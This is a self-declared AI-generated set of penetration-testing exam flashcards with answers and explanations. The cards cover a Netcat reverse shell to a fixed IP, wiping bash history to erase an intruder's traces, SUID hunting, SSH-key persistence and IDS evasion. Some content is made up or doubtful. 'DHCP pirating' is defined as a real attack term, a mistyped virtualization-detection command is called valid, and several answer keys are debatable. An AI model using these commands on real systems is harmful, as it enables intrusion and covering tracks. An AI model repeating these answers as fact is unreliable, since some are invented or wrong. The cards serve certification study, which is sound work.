ChatGPT made up some questions Flashcards
Annie wants to permanently remove evidence of commands she entered in a Bash shell on a compromised Linux system. Which command should she use?
- history -c
- kill -9 $$
- echo “” > ~/.bash_history
- ln /dev/null ~/.bash_history -sf
ln /dev/null ~/.bash_history -sf
While history -c clears the current session’s history, the Bash history file will still persist on disk. The correct answer is D, ln /dev/null ~/.bash_history -sf, which creates a symbolic link to /dev/null for the history file. This effectively prevents any future commands from being written to ~/.bash_history, permanently erasing the history
Kaiden is performing an automated web application security scan before deployment. Which tool is best suited for this task?
- nmap
- Nikto
- Wireshark
- CeWL
Nikto
Nikto is a dedicated web application security scanner designed to identify vulnerabilities such as misconfigurations, outdated software, and potential security issues in web servers and applications. Nmap is primarily a network scanner, Wireshark is a packet analysis tool, and CeWL is a tool for creating custom wordlists
Steve is gathering information during a penetration test without actively interacting with or probing the target systems. What type of information is he collecting?
- OSINT
- HSI
- Background
- None of the above
OSINT
Open Source Intelligence (OSINT) involves collecting publicly available information about a target without engaging in direct interaction. This includes using sources like websites, social media, and publicly accessible databases. It is a passive reconnaissance technique
Brian is investigating his organization’s servers to look for evidence of past breaches. What term best describes this activity?
- Penetration testing
- Vulnerability scanning
- Remediation
- Threat hunting
Threat hunting
involves proactively searching an organization’s infrastructure for signs of past or ongoing breaches. Unlike penetration testing or vulnerability scanning, threat hunting adopts the attacker’s mindset to find evidence of compromises
Liam runs the following command on a compromised system:
nc 10.1.10.1 7337 -e /bin/sh
What has Liam done?
- Started a reverse shell using Netcat
- Captured traffic on the Ethernet port to the console via Netcat
- Set up a bind shell using Netcat
- None of the above
Started a reverse shell using Netcat
The correct answer is A. Started a reverse shell using Netcat. In this command, Netcat (nc) connects to the remote IP address (10.1.10.1) on port 7337 and executes the Bash shell (/bin/sh). This creates a reverse shell where the compromised system initiates the connection to the attacker’s system
Alaina wants to conduct an on-path attack against a target system. Which technique can she use to make it appear she has the IP address of a trusted server?
- ARP spoofing
- IP proofing
- DHCP pirating
- Spoofmastering
ARP spoofing
ARP spoofing involves sending forged ARP responses to associate the attacker’s MAC address with the IP address of a trusted server. This allows the attacker to intercept traffic intended for the legitimate server, enabling an on-path attack
Spoofmastering and IP proofing are made up
DHCP pirating
involves an attacker compromising or impersonating a DHCP server to distribute rogue IP configurations to clients on a network. This can be used to redirect traffic, enable man-in-the-middle attacks, or disrupt network connectivity
Michael’s social engineering attack relies on telling staff members that others have already provided the information he is requesting. What motivation technique is he using?
- Authority
- Scarcity
- Likeness
- Social proof
Social proof
Explanation:
The correct answer is D. Social proof. Social proof relies on convincing the target that others have already taken a specific action or provided the requested information, leveraging the target’s trust in collective behavior. Likeness relies on building rapport and finding commonalities with the target
Vincent wants access to workstations at his target organization but cannot gain entry to the building or remote access. What technique can he use to attempt physical compromise?
- Shoulder surfing
- Kerberoasting
- USB key drop
- Quid pro quo
USB key drop
A USB key drop involves leaving malicious USB drives in accessible locations to tempt employees into plugging them into their workstations. This technique relies on human curiosity and can install malware or provide the attacker with access
Jennifer discovers the following file attributes on a Linux system:
-rwsr-xr– 1 root kismet 653905 Nov 4 2016 /usr/bin/kismet_capture
What type of file has she found?
- An encrypted file
- A hashed file
- A SUID file
- A SIP file
A SUID file
Explanation:
The “s” in the file permissions indicates that this is a SUID (Set User ID) file. When executed, it runs with the permissions of its owner (in this case, root) rather than the user who runs it. This can be a security risk if improperly managed
SUID file
- A SUID file in Linux is indicated by an “s” in the owner execute position of the file permissions (e.g., -rwsr-xr–)
- This means that when the file is executed, it runs with the permissions of the file owner (typically root) rather than the user executing the file
- SUID is a legitimate feature but can be a security risk if improperly configured, as it can be exploited to elevate privileges.
SIP file
- SIP (System Integrity Protection) is a macOS-specific security feature and does not apply directly to Linux files.
- SIP is designed to protect system files, directories, and processes from being modified, even by users with root privileges.
Chris suspects a Linux system he has compromised is a virtual machine. Which of the following techniques will NOT help confirm virtualization?
- Run system-detect-virt.
- Run ls -l /dev/disk/by-id.
- Run wmic baseboard get manufacturer, product.
- Run dmidecode to retrieve hardware information.
Run wmic baseboard get manufacturer, product.
The correct answer is C. Run wmic baseboard get manufacturer, product. This command is specific to Windows and cannot be used on a Linux system to check for virtualization. The other options are valid methods for identifying virtualization on Linux
Which of the following tools is best suited for performing passive reconnaissance using open-source intelligence (OSINT)?
- Nmap
- Shodan
- Metasploit
- Nikto
Shodan
Shodan is a search engine specifically designed to identify devices connected to the internet and provide OSINT for passive reconnaissance. It allows penetration testers to gather information without directly interacting with the target. Tools like Nmap, Metasploit, and Nikto involve active interaction and scanning of the target systems.
What type of privilege escalation involves exploiting software bugs to gain higher permissions on a system?
- Vertical privilege escalation
- Horizontal privilege escalation
- Exploit chaining
- Social engineering
Vertical privilege escalation
Vertical privilege escalation occurs when an attacker exploits software bugs or vulnerabilities to gain higher permissions, such as moving from a standard user account to an administrative account. Horizontal privilege escalation, in contrast, involves accessing another user’s data or privileges at the same level
What is the main purpose of setting up a SOCKS proxy during a penetration test?
- To intercept and modify web traffic
- To anonymize the penetration tester’s traffic
- To route traffic through a compromised system for lateral movement
- To exfiltrate data from a target network
To route traffic through a compromised system for lateral movement
A SOCKS proxy is commonly used during penetration testing to route traffic through a compromised system. This allows the penetration tester to perform lateral movement within the target network while maintaining control over traffic flow. Intercepting or modifying web traffic would typically involve tools like Burp Suite, not SOCKS proxies.
Which type of vulnerability occurs when an application includes unvalidated user input in a web request without proper encoding or validation?
- Cross-Site Scripting (XSS)
- SQL Injection
- File Inclusion
- Command Injection
Cross-Site Scripting (XSS)
Cross-Site Scripting (XSS) vulnerabilities occur when an application fails to properly validate or encode user input, allowing malicious scripts to be executed in the browser of another user. This can result in data theft, session hijacking, or unauthorized actions on behalf of the victim. SQL injection, file inclusion, and command injection target different components of a system
Which of the following tools would a penetration tester use to test for directory traversal vulnerabilities in a web application?
- Burp Suite
- Metasploit
- Nikto
- Hydra
Nikto
Nikto is a web server scanner designed to identify vulnerabilities, including directory traversal, outdated software, and insecure configurations. While Burp Suite can also test for web vulnerabilities, it requires manual configuration for such tests. Metasploit focuses on exploits, and Hydra is used for password attacks
What technique can attackers use to spoof their IP address during an on-path attack?
- MAC flooding
- IP spoofing
- VLAN hopping
- DNS cache poisoning
IP spoofing
Explanation:
IP spoofing involves forging the source IP address in packets to make them appear as if they originate from a trusted source. This technique is commonly used during on-path attacks to intercept or redirect traffic. DNS cache poisoning manipulates DNS responses, but it doesn’t spoof IP addresses directly
IP spoofing
- technique used in cybersecurity to forge the source IP address of a packet, making it appear as though the packet originates from a trusted source
- Attackers use IP spoofing to bypass security measures, hide their identity, or conduct specific types of attacks such as on-path attacks or denial-of-service (DoS
What does the chmod 4755 command do when applied to a Linux executable file?
- Makes the file writable by all users
- Sets the SUID bit, allowing execution with the owner’s privileges
- Hides the file from directory listings
- Denies execution for non-root users
Sets the SUID bit, allowing execution with the owner’s privileges
The chmod 4755 command sets the SUID (Set User ID) bit on an executable file, enabling it to execute with the permissions of the file’s owner rather than the user running it. This is often used for system binaries but can be a security risk if misused.
Which of the following best describes the purpose of a honeypot in penetration testing?
- To identify vulnerabilities in internal systems
- To attract and monitor attackers’ activities
- To prevent unauthorized access to critical systems
- To provide redundancy for high-availability services
To attract and monitor attackers’ activities
A honeypot is a decoy system designed to lure attackers and monitor their behavior, providing valuable insights into their tactics, techniques, and procedures. It is not intended for system protection or redundancy but rather as a tool for detection and research.
Which scripting language is commonly used to automate penetration testing tasks and create custom scripts for exploits?
- PowerShell
- Ruby
- Python
- Perl
Python
Python is one of the most widely used scripting languages for automating penetration testing tasks and developing custom exploits due to its versatility, extensive libraries, and ease of use. While PowerShell is used in Windows environments, and Ruby and Perl are also scripting options, Python is the most common choice for penetration testing
SOCKS proxy
- a transport layer proxy that routes traffic through an intermediary, supporting protocols like TCP and UDP
- commonly used in penetration testing for lateral movement, allowing traffic to pivot through a compromised host and access internal networks
- anonymize traffic by masking the original source
DNS poisoning
- also known as DNS cache poisoning or DNS spoofing
- an attack that corrupts the DNS resolution process
- manipulates the DNS cache of a resolver or a user’s machine to redirect traffic from legitimate websites to malicious ones without the user’s knowledge
chmod 4755
Turns the file into an SUID file (When the file is executed, it runs with the privileges of the file owner, regardless of the user’s privileges; Commonly used for system utilities that require elevated privileges (e.g., /usr/bin/passwd))
The First Digit: 4 (SetUID bit)
4 (SetUID): This sets the SUID (Set User ID) bit on the file.
- The Remaining Digits: 755 (Standard File Permissions)
These represent the file’s owner, group, and others permissions:
7 (Owner): Read (r), write (w), and execute (x) permissions.
5 (Group): Read (r) and execute (x) permissions.
5 (Others): Read (r) and execute (x) permissions.
You are conducting a penetration test and need to identify which systems on a target network are vulnerable to remote code execution exploits. Which of the following tools is most suited for this task, and why?
- Nikto
- Nmap
- Wireshark
- Burp Suite
Nmap
Nmap is a versatile network scanner that can perform detailed reconnaissance of systems on a network. With the use of scripts (such as the Nmap Scripting Engine or NSE), it can check for specific vulnerabilities, including those that allow remote code execution. Nikto (option A) is primarily a web server scanner and is not used for general network vulnerability scanning
During a penetration test, you gain access to a Linux system and want to maintain persistence. Which of the following methods is most likely to provide persistence without requiring high privileges?
- Creating a cron job to execute your payload
- Adding your payload to the system’s startup scripts
- Modifying the SSH authorized_keys file
- Installing a rootkit
Modifying the SSH authorized_keys file
Modifying the ~/.ssh/authorized_keys file allows you to add your public SSH key to the target user’s SSH configuration. This method provides persistence without requiring elevated (root) privileges, as it only requires write access to the target user’s home directory. While creating a cron job (Option A) or modifying startup scripts (Option B) are valid persistence techniques, they typically require higher privileges. Installing a rootkit (Option D) is also persistent but involves significant risks and high privilege requirements
A penetration tester needs to enumerate subdomains for a target organization as part of the reconnaissance phase. Which tool is most appropriate for this task?
- theHarvester
- Nessus
- Nikto
- Wireshark
theHarvester
theHarvester is specifically designed for gathering open-source intelligence (OSINT) such as subdomains, email addresses, and other related information from public sources. It is highly effective during the reconnaissance phase of a penetration test. Nessus (Option B) and Nikto (Option C) are used for vulnerability scanning, and Wireshark (Option D) captures and analyzes network traffic, making them unsuitable for this task
You want to test whether a target system is vulnerable to a Man-in-the-Middle (MitM) attack by spoofing ARP messages. Which tool would you choose?
- Responder
- Aircrack-ng
- Ettercap
- Hydra
Ettercap
Ettercap is a tool designed specifically for carrying out Man-in-the-Middle (MitM) attacks, including ARP spoofing, allowing penetration testers to intercept, manipulate, or observe network traffic. Responder (Option A) is used for capturing credentials in network poisoning attacks but does not perform ARP spoofing. Aircrack-ng (Option B) focuses on wireless network attacks, and Hydra (Option D) is used for brute-forcing credentials
Ettercap
- A comprehensive suite of tools for performing on-path (Man-in-the-Middle) attacks on a variety of systems and protocols.
- Allows penetration testers to intercept, monitor, and manipulate live network traffic.
- Open-source and supports plugins to extend its capabilities.
During a penetration test, you want to enumerate all user accounts on a Windows system using SMB. Which tool or technique would be best suited for this task?
- BloodHound
- PsExec
- Enum4linux
- CrackMapExec
Enum4linux
Enum4linux is a tool specifically designed for enumerating information from Windows systems using SMB, including user accounts, shared resources, and group memberships. BloodHound (Option A) is used for Active Directory enumeration and attack path analysis, PsExec (Option B) is for executing commands on remote systems, and CrackMapExec (Option D) is a broader post-exploitation tool that focuses on lateral movement and credential testing
Enum4linux
- A Linux-based tool for enumerating information from Windows systems via SMB, including user accounts, shares, and other sensitive details.
- It is widely used during reconnaissance to gather critical data about a target environment.
- Supports additional enumeration tasks like identifying group memberships and operating system details.
You need to test a target network for vulnerabilities associated with the SMB protocol. Which tool would allow you to scan for and exploit SMB vulnerabilities efficiently?
- Metasploit
- Nikto
- Nessus
- Burp Suite
Metasploit
Metasploit is a powerful framework for vulnerability assessment and exploitation, making it ideal for identifying and exploiting SMB vulnerabilities. It includes specific modules, such as those for EternalBlue and SMB enumeration. Nessus (Option C) is a vulnerability scanner and can identify SMB vulnerabilities but does not exploit them. Nikto (Option B) is for web server scanning, and Burp Suite (Option D) focuses on web application vulnerabilities
You are writing a script to automate the process of extracting IP addresses from log files. Which scripting language would be the most efficient and commonly used for this task in penetration testing?
- Python
- Bash
- Ruby
- PowerShell
Python
is highly efficient and widely used in penetration testing due to its simplicity and extensive libraries for handling tasks like string manipulation, regex operations, and file processing. While Bash (Option B) is useful for shell scripting, Python is more powerful for processing structured data. Ruby (Option C) is less commonly used for this purpose, and PowerShell (Option D) is primarily tailored for Windows environment
During a penetration test, you identify an open port running a MySQL service. Which tool would you use to test for vulnerabilities in the database?
- Burp Suite
- SQLmap
- Nikto
- Nessus
SQLmap
SQLmap is a tool designed for testing SQL injection vulnerabilities, making it ideal for testing MySQL and other databases for exploitable flaws. Burp Suite (Option A) is used for web application testing, Nikto (Option C) scans web servers for common vulnerabilities, and Nessus (Option D) is a general-purpose vulnerability scanner but not specifically focused on SQL injection
Which tool would you use to craft custom packets for testing firewalls and IDS/IPS systems?
- Nmap
- Hping
- Nessus
- Hydra
Hping
Hping is a command-line tool used to craft and send custom packets, making it ideal for testing firewalls and intrusion detection/prevention systems (IDS/IPS). It provides flexibility in creating packets with specific headers, payloads, and flags. Nmap (Option A) is primarily a network scanning tool, Nessus (Option C) is for vulnerability assessment, and Hydra (Option D) is for brute-forcing credentials
During a penetration test, you gain a limited shell on a Linux target. Which command will you use to attempt privilege escalation by checking for misconfigured SUID binaries?
- ls -al /usr/bin/
- sudo -l
- find / -perm -4000 -type f 2>/dev/null
- ps aux | grep root
find / -perm -4000 -type f 2>/dev/null
The command find / -perm -4000 -type f 2>/dev/null searches for files with the SUID bit set (-perm -4000) across the entire file system (/). SUID binaries can allow privilege escalation if they are misconfigured. While ls -al /usr/bin/ (Option A) lists files in a directory, it doesn’t find all SUID files. sudo -l (Option B) checks a user’s permissions with sudo but isn’t for finding SUID binaries. ps aux | grep root (Option D) lists processes run by the root user but doesn’t help with privilege escalation directly
You need to test for insecure APIs in a web application. Which tool would be most effective?
- OWASP ZAP
- Nikto
- Aircrack-ng
- John the Ripper
OWASP ZAP
OWASP ZAP is a robust web application testing tool that includes features for API testing, such as intercepting and analyzing API requests and responses for vulnerabilities. Nikto (Option B) focuses on web server vulnerabilities, Aircrack-ng (Option C) is for wireless network testing, and John the Ripper (Option D) is for password cracking
You suspect that an attacker has tampered with a critical log file on a compromised system. Which method would you use to verify the integrity of the log file?
- Compare the log file against a known good backup.
- Open the log file and inspect its contents manually.
- Search for known attack patterns in the log file.
- Run the ls command to check the file’s size and modification date.
Compare the log file against a known good backup
The most reliable way to verify the integrity of a log file is to compare it against a trusted, unaltered backup copy. This ensures that you detect even subtle modifications. Inspecting the file manually (Option B) may not reveal hidden changes, searching for attack patterns (Option C) might miss tampering unrelated to those patterns, and checking the file’s size and modification date with ls (Option D) provides limited information and can be easily manipulated by attackers
During a penetration test, you discover that a target web application stores sensitive data in a session token without encryption. Which vulnerability best describes this issue?
- Insecure Direct Object Reference (IDOR)
- Session Fixation
- Information Disclosure
- Broken Authentication
Information Disclosure
Storing sensitive data in session tokens without encryption is an example of Information Disclosure. This vulnerability occurs when sensitive information is exposed in an unsafe manner, such as being stored in cleartext. Insecure Direct Object Reference (Option A) pertains to unauthorized access to objects, Session Fixation (Option B) relates to session management flaws, and Broken Authentication (Option D) involves failures in enforcing authentication mechanisms.
Which tool would you use to analyze Windows memory dumps for signs of malware or other malicious activity?
- Volatility
- Wireshark
- Metasploit
- BloodHound
Volatility
Volatility is a powerful tool for memory forensics and is specifically designed to analyze memory dumps from Windows and other operating systems. It can identify malware, processes, and other malicious activities in memory. Wireshark (Option B) analyzes network traffic, Metasploit (Option C) is an exploitation framework, and BloodHound (Option D) is used for Active Directory attack path mapping
Volatility
- Purpose: A memory forensics framework used to analyze memory dumps from compromised systems.
- Capabilities: Identifies malware, suspicious processes, and other malicious activity in system memory.
- Use Case: Detecting malicious code and activities post-exploitation on Windows, Linux, and macOS.
You want to identify whether a Linux system is running inside a virtualized environment. Which command would provide this information?
- dmesg | grep virtual
- lsmod | grep vm
- ifconfig | grep eth0
- ps aux | grep vmware
dmesg | grep virtual
The dmesg command displays messages from the system’s kernel, and using grep virtual filters for virtualization-related information. This method is a reliable way to determine whether a system is running in a virtualized environment. While lsmod | grep vm (Option B) may show virtualization modules, it’s not always comprehensive. Options C and D do not directly identify virtualization
A penetration tester is using a tool to simulate multiple types of web application attacks, including XSS and CSRF. Which tool is being used?
- BeEF
- OWASP ZAP
- Nikto
- Burp Suite
BeEF
BeEF (Browser Exploitation Framework) specializes in exploiting browser vulnerabilities, including Cross-Site Scripting (XSS) and Cross-Site Request Forgery (CSRF). While Burp Suite (Option D) is a comprehensive web application testing tool, BeEF is specifically focused on browser-based attack scenarios. OWASP ZAP (Option B) is for general web application vulnerability testing, and Nikto (Option C) focuses on web server vulnerabilities
You need to evade detection while performing a network scan on a target system. Which of the following techniques is the most effective?
- Fragmenting packets
- Using the -T4 timing option in Nmap
- Sending scans from a single IP address
- Scanning all ports simultaneously
Fragmenting packets.
Fragmenting packets is an effective technique for evading detection because it splits the scan traffic into smaller packets, making it harder for intrusion detection systems (IDS) to recognize and block the activity. Using the -T4 timing option (Option B) increases scanning speed but is more likely to trigger detection. Sending scans from a single IP address (Option C) and scanning all ports simultaneously (Option D) are also more conspicuous and likely to be detected
